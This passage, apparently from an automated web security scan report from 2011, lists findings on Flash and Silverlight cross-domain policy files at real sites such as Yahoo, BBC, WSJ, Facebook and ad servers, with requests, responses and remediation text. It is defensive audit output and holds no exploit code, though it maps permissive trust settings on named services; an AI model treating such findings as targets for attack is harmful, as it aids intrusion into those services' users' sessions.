<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
4.65. http://my.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:11:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
4.66. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=104
Expires: Mon, 13 Jun 2011 14:47:37 GMT
Date: Mon, 13 Jun 2011 14:45:53 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...
4.67. http://online.wsj.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:55 GMT
Server: Apache
Last-Modified: Tue, 17 May 2011 13:55:25 GMT
Accept-Ranges: bytes
Content-Length: 3647
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=34
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
    <allow-access-from domain="m.doubleclick.net"/>
    <allow-access-from domain="*.dowjonesonline.com"/>
    <allow-access-from domain="www.dowjonesonline.com"/>
    <allow-access-from domain="a.marketwatch.com"/>
    <allow-access-from domain="*.marketwatch.com"/>
    <allow-access-from domain="www.akamai.com"/>
    <allow-access-from domain="*.akamai.com"/>
    <allow-access-from domain="www.wsj.com"/>
    <allow-access-from domain="*.wsj.com"/>
    <allow-access-from domain="s.dev.wsj.com"/>
    <allow-access-from domain="idev.online.wsj.com"/>
    <allow-access-from domain="s.wsjsat.dowjones.net"/>
    <allow-access-from domain="s.s.dev.wsj.com"/>
<allow-access-from domain="reno.wsjqa.dowjones.net"/>
    <allow-access-from domain="*.online.wsj.com"/>
...[SNIP]...
<allow-access-from domain="quotes.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="public.wsj.com"/>
    <allow-access-from domain="*.public.wsj.com"/>
<allow-access-from domain="www.barrons.com"/>
    <allow-access-from domain="*.barrons.com"/>
...[SNIP]...
<allow-access-from domain="idev.online.barrons.com"/>
    <allow-access-from domain="*.online.barrons.com"/>
    <allow-access-from domain="online.barrons.com"/>
    <allow-access-from domain="public.barrons.com"/>
    <allow-access-from domain="*.public.barrons.com"/>
    <allow-access-from domain="*.aol.com"/>
    <allow-access-from domain="*.brightcove.com"/>
    <allow-access-from domain="creatives.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="wsjdigital.com"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.piclens.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dowjones.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="online.s.dev.wsj.com"/>
    <allow-access-from domain="quotes.s.dev.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="polls.s.dev.wsj.com"/>
<allow-access-from domain="blogs.s.dev.wsj.com"/>
<allow-access-from domain="triplewebdesign.com"/>
<allow-access-from domain="ingyournumber.com"/>
   <allow-access-from domain="*.ingyournumber.com"/>
<allow-access-from domain="*.issuu.com"/>
   <allow-access-from domain="static.issuu.com"/>
    <allow-access-from domain="professional.s.dev.wsj.com"/>
    <allow-access-from domain="*.dartmotif.com"/>
    <allow-access-from domain="wsjradio.com"/>
    <allow-access-from domain="*.wsjradio.com"/>
    <allow-access-from domain="www.wsjradio.com"/>
    <allow-access-from domain="*.eyereturn.com"/>
<allow-access-from domain="fxtrader.l.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.f.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.s.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.dowjones.com"/>
    <allow-access-from domain="dowjones.visualla.com"/>
<allow-access-from domain="*.smartmoney.com"/>
<allow-access-from domain="*wsj-asia.com"/>
<allow-access-from domain="*.wsj-asia.com"/>
...[SNIP]...
4.68. http://p.opt.fimserve.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Type: application/xml
Content-Length: 695
Date: Tue, 14 Jun 2011 00:13:57 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...
4.69. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.182
Date: Tue, 14 Jun 2011 00:14:25 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...
4.70. http://us.adserver.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://us.adserver.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.adserver.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 07 Apr 2011 23:30:00 GMT
Accept-Ranges: bytes
Content-Length: 1934
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="www.comcast.net" />
<allow-access-from domain="dpbaseball.comcast.net" />
<allow-access-from domain="fantasysports.comcast.net" />
<allow-access-from domain="finance.comcast.net" />
<allow-access-from domain="horoscope.comcast.net" />
<allow-access-from domain="sz0005.wc.mail.comcast.net" />
<allow-access-from domain="games.comcast.net" />
<allow-access-from domain="community.comcast.net" />
<allow-access-from domain="player.sambatech.com.br" />
<allow-access-from domain="*.zope.net" />
<allow-access-from domain="*muzu.tv" />
<allow-access-from domain="*movieclips.com" />
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
4.71. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.142.64
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...
4.72. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 13:39:39 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 06 Jun 2011 20:41:57 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Mon, 13 Jun 2011 14:09:39 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...
4.73. https://edit.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edit.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 01 Nov 2010 22:44:30 GMT
Accept-Ranges: bytes
Content-Length: 235
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="open.login.yahoo.com" secure="true"/>
...[SNIP]...
4.74. http://s0.videopress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.videopress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.videopress.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/x-cross-domain-policy
Date: Tue, 14 Jun 2011 00:32:02 GMT
Last-Modified: Thu, 26 May 2011 00:08:19 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 884
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" />
...[SNIP]...
<allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" />
...[SNIP]...
<allow-access-from domain="stats.wordpress.com" to-ports="80,443" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" />
...[SNIP]...
4.75. http://stats.wordpress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 17:45:16 GMT
Content-Type: text/xml
Connection: close
Content-Length: 585
Last-Modified: Wed, 23 Jun 2010 20:40:25 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...
4.76. http://videopress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videopress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: videopress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:31:44 GMT
Content-Type: text/x-cross-domain-policy
Connection: close
Content-Length: 884
Last-Modified: Thu, 26 May 2011 00:08:10 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" />
...[SNIP]...
<allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" />
...[SNIP]...
<allow-access-from domain="stats.wordpress.com" to-ports="80,443" />
...[SNIP]...
<allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" />
...[SNIP]...
4.77. http://yadvertisingblog.app3.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yadvertisingblog.app3.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: yadvertisingblog.app3.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 21:47:20 GMT
Accept-Ranges: bytes
ETag: "0e4f34a711c81:ccd2"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:21:35 GMT
Connection: close

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...
5. Silverlight cross-domain policy  previous  next
There are 15 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Mon, 13 Jun 2011 14:11:24 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
5.2. http://ads.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:1334"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...
5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 14 Jun 2011 17:45:46 GMT
Date: Mon, 13 Jun 2011 17:45:46 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
5.4. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 15 Jun 2011 00:16:56 GMT
Date: Tue, 14 Jun 2011 00:16:56 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
5.5. http://mswindowswolglobal.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mswindowswolglobal.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mswindowswolglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:34:26 GMT
Server: Omniture DC/2.0.0
xserver: www375
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
5.6. http://om.dowjoneson.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.dowjoneson.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: om.dowjoneson.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:57 GMT
Server: Omniture DC/2.0.0
xserver: www357
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
